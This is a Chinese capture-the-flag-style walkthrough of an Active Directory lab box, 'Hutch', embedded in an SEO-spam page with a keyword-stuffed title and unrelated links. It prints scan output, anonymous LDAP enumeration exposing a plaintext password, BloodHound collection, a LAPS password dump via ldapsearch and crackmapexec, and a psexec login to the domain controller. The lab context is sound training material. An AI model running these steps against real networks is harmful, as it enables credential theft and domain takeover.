当前位置: 首页 > wzjs >正文

黑客网站盗qq品牌网络营销策划书

黑客网站盗qq,品牌网络营销策划书,网站网站建设设计公司,机械设备上哪个网站做外贸推广启程: 这回东西很多,但是有用的消息就那么几条,53端口开放可能需要我们考虑DNS外部传输一类的,80则是要考虑可能存在什么服务搭载,88端口告诉我们正在托管kerberos服务,135、139、445则是告诉我们记得使用…

 启程:

这回东西很多,但是有用的消息就那么几条,53端口开放可能需要我们考虑DNS外部传输一类的,80则是要考虑可能存在什么服务搭载,88端口告诉我们正在托管kerberos服务,135、139、445则是告诉我们记得使用smbclient看一下有没有可以访问的公开目录,389、3268搭载着ldap服务这里我们需要使用lapsearch进行枚举,636、3269搭载着ldas服务,5895则是托管着winrm服务

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/10.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Tue, 25 Mar 2025 07:20:08 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-25 07:19:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time: 
|   date: 2025-03-25T07:20:11
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

这里我们给出两条命令对ldap服务进行枚举,第一条命令为了确认base namingcontext,第二条命令是在得到base namingcontext之后对其进行匿名ldap搜索

ldapsearch -H ldap://192.168.55.122 -x -s base namingcontexts
ldapsearch -x -h 192.168.55.122 -b "dc=hutch,dc=offsec"

 执行第二条命令时候,我们得到一堆用户名,然后在这里我们翻到最后一条的时候,发现了一组票据,然后记录下来,用于后续的smb登录和winrm登录尝试

我们尝试了smb登录和winrm登录均失败,所以我们使用bloodhound整理一下我们当前用户具备哪些权限,然后这里我们使用bloodhound-python收集boodhound的json文件

/usr/bin/bloodhound-python --dns-tcp -ns 192.168.55.122 -d hutch.offsec -u 'fmcsorley' -p 'CrabSharkJellyfish192' -c all

 然后启动一下neo4j

将我们搞到的json文件,导入即可

在左上角选择最短路径即可看到我们当前用户具备读laps password的权限

然后我们使用本靶场最重要的命令,使用第一条命令检索laps密码,第二条命令也可以实现同样得结果,大家看着来就行

ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://192.168.55.122 "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwdcrackmapexec ldap 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.55.122 -M laps

然后我们使用得到的管理员票据尝试登录,使用psexec成功登录域控的管理员账户

/usr/share/doc/python3-impacket/examples/psexec.py "HUTCH/Administrator@192.168.55.122"

总结:

靶场设置的还不错,可以很好的补充你的ldapsearch命令,顺道帮你巩固了一下bloodhound使用,提权的方式也是很新奇的,至于其他的枚举命令我重启靶机的时候都没了,就没带记录,需要枚举命令的可以私信我

有效链接:

SpecterOps/BloodHound:六度域管理员 --- SpecterOps/BloodHound: Six Degrees of Domain Adminhttps://github.com/SpecterOps/BloodHound

http://www.dtcms.com/wzjs/294718.html

相关文章:

  • 利用博客做网站排名青柠影院免费观看电视剧高清
  • 广州品牌网站建设公司seo推广怎么做视频教程
  • 查工程建设不良记录免费的网站站长工具 seo综合查询
  • iis网页提示网站建设中百度快照怎么优化排名
  • 禅城区网站建站网站全国新闻媒体发稿平台
  • 电商网店代运营株洲seo优化公司
  • 优惠券的网站怎么做整站优化提升排名
  • 网站建设的过程seo推广公司教程
  • wordpress移动下拉菜单cssseo发帖论坛
  • 网站当电话线快速优化关键词排名
  • 怎么用dw做可上传文件的网站品牌推广方案怎么写
  • 介绍家乡的网站怎么做全球外贸b2b网站
  • 荔湾做网站西安seo服务培训
  • 公众号制作要求网站seo策划方案案例分析
  • wordpress的登录安全认证债务优化是什么意思
  • 网站 推广 实例北京seo课程
  • 网站建设banner上用的话2020做seo还有出路吗
  • 提供手机自适应网站建设seo网站推广专员招聘
  • 沧州做网站推广公司百度搜索链接
  • 网站 支持建设单位奶糖 seo 博客
  • 做一个购物网站需要什么技术百度云手机登录入口
  • 做网站的公司 设计好近期国内新闻热点事件
  • 无锡网站制作中国最新消息
  • 技术支持 英铭网站建设个人网站推广怎么做
  • 教育门户网站建设方案seo专家招聘
  • 净水器网站制作国外网站seo
  • 地方新闻网站阜宁农村建设好的竞价推广托管
  • 国企网站建设合同怎么做一个网站平台
  • 做web网站时要添加图片站长之家网站
  • 满城网站建设百度技术培训中心